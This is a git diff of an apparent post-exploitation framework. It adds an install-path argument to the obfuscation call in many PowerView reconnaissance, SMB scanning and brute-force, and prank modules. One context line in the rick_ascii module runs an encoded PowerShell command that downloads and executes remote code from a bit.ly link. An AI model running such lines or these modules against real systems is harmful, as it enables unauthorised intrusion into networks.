a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py index 398e948..bf4e24f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py index 0fc757f..6e79356 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py @@ -108,5 +108,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py index 3422d5d..c9744d1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py index 2acb7aa..ab03fc8 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py @@ -133,5 +133,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py index 15a4e90..1fc5981 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py index ce408c8..8593fdd 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py @@ -88,5 +88,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py index feea3fb..db906f7 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py index e2889bc..374e0e9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py index cfef751..e249a34 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py index 4ac729b..26b830c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py index 764fc63..6bc3df3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py @@ -92,5 +92,5 @@ class Module: script += '| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py index 3120886..055c482 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py @@ -147,5 +147,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py index 3c6379e..dfcd952 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py @@ -124,5 +124,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py index ba45584..3589dac 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py index 05631cd..a1d2d15 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py @@ -158,5 +158,5 @@ class Module: script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/reverse_dns.py b/lib/modules/powershell/situational_awareness/network/reverse_dns.py index 26e3069..287c4eb 100644 --- a/lib/modules/powershell/situational_awareness/network/reverse_dns.py +++ b/lib/modules/powershell/situational_awareness/network/reverse_dns.py @@ -92,6 +92,6 @@ class Module: # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbautobrute.py b/lib/modules/powershell/situational_awareness/network/smbautobrute.py index 8da9d7f..a8765fa 100644 --- a/lib/modules/powershell/situational_awareness/network/smbautobrute.py +++ b/lib/modules/powershell/situational_awareness/network/smbautobrute.py @@ -130,6 +130,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbscanner.py b/lib/modules/powershell/situational_awareness/network/smbscanner.py index b784693..c5c133d 100644 --- a/lib/modules/powershell/situational_awareness/network/smbscanner.py +++ b/lib/modules/powershell/situational_awareness/network/smbscanner.py @@ -133,6 +133,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Invoke-SMBScanner completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py index 90abefb..6f358e1 100644 --- a/lib/modules/powershell/trollsploit/get_schwifty.py +++ b/lib/modules/powershell/trollsploit/get_schwifty.py @@ -99,5 +99,5 @@ Function Get-Schwifty script += "; 'Agent is getting schwifty!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/message.py b/lib/modules/powershell/trollsploit/message.py index 78c31be..76b0635 100644 --- a/lib/modules/powershell/trollsploit/message.py +++ b/lib/modules/powershell/trollsploit/message.py @@ -95,5 +95,5 @@ Invoke-Message""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/process_killer.py b/lib/modules/powershell/trollsploit/process_killer.py index 25ab191..89506f4 100644 --- a/lib/modules/powershell/trollsploit/process_killer.py +++ b/lib/modules/powershell/trollsploit/process_killer.py @@ -110,5 +110,5 @@ Invoke-ProcessKiller""" script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_ascii.py b/lib/modules/powershell/trollsploit/rick_ascii.py index 9cbdef0..774d580 100644 --- a/lib/modules/powershell/trollsploit/rick_ascii.py +++ b/lib/modules/powershell/trollsploit/rick_ascii.py @@ -55,5 +55,5 @@ class Module: # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w") script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_astley.py b/lib/modules/powershell/trollsploit/rick_astley.py index 733aa87..6e19f56 100644 --- a/lib/modules/powershell/trollsploit/rick_astley.py +++ b/lib/modules/powershell/trollsploit/rick_astley.py @@ -72,6 +72,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/thunderstruck.py b/lib/modules/powershell/trollsploit/thunderstruck.py index 041b259..00b426e 100644 --- a/lib/modules/powershell/trollsploit/thunderstruck.py +++ b/lib/modules/powershell/trollsploit/thunderstruck.py @@ -99,5 +99,5 @@ Function Invoke-Thunderstruck script += "; 'Agent Thunderstruck.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/voicetroll.py b/lib/modules/powershell/trollsploit/voicetroll.py index 2d0eb80..1e7e021 100644 --- a/lib/modules/powershell/trollsploit/voicetroll.py +++ b/lib/modules/powershell/trollsploit/voicetroll.py @@ -85,5 +85,5 @@ Invoke-VoiceTroll""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wallpaper.py b/lib/modules/powershell/trollsploit/wallpaper.py index cdb21c5..d970f24 100644 --- a/lib/modules/powershell/trollsploit/wallpaper.py +++ b/lib/modules/powershell/trollsploit/wallpaper.py @@ -143,5 +143,5 @@ namespace Wallpaper script += "; 'Set-Wallpaper executed'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py index 62d76a9..f647c6d 100644 --- a/lib/modules/powershell/trollsploit/wlmdr.py +++ b/lib/modules/powershell/trollsploit/wlmdr.py @@ -108,5 +108,5 @@ Invoke-Wlrmdr""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script